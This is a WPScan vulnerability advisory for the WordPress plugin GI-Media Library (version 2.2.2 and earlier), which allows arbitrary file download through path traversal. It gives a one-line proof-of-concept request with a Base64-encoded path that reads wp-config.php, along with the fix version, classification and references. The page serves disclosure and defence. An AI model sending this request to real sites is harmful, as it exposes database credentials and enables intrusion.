GI-Media Library <= 2.2.2 - Arbitrary File Download

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
/wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==

Where "Li4vLi4vLi4vd3AtY29uZmlnLnBocA==" is "../../../wp-config.php" Base64 encoded.

Affects

Plugin gi-media-library
fixed in version 3.0

References

URL http://wordpressa.quantika14.com/repository/index.php?id=24
URL https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 197
Verified Yes
WPVDB ID 7754

Timeline

Added 2015-01-15 (almost 2 years ago)
Last Updated 2015-09-20 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.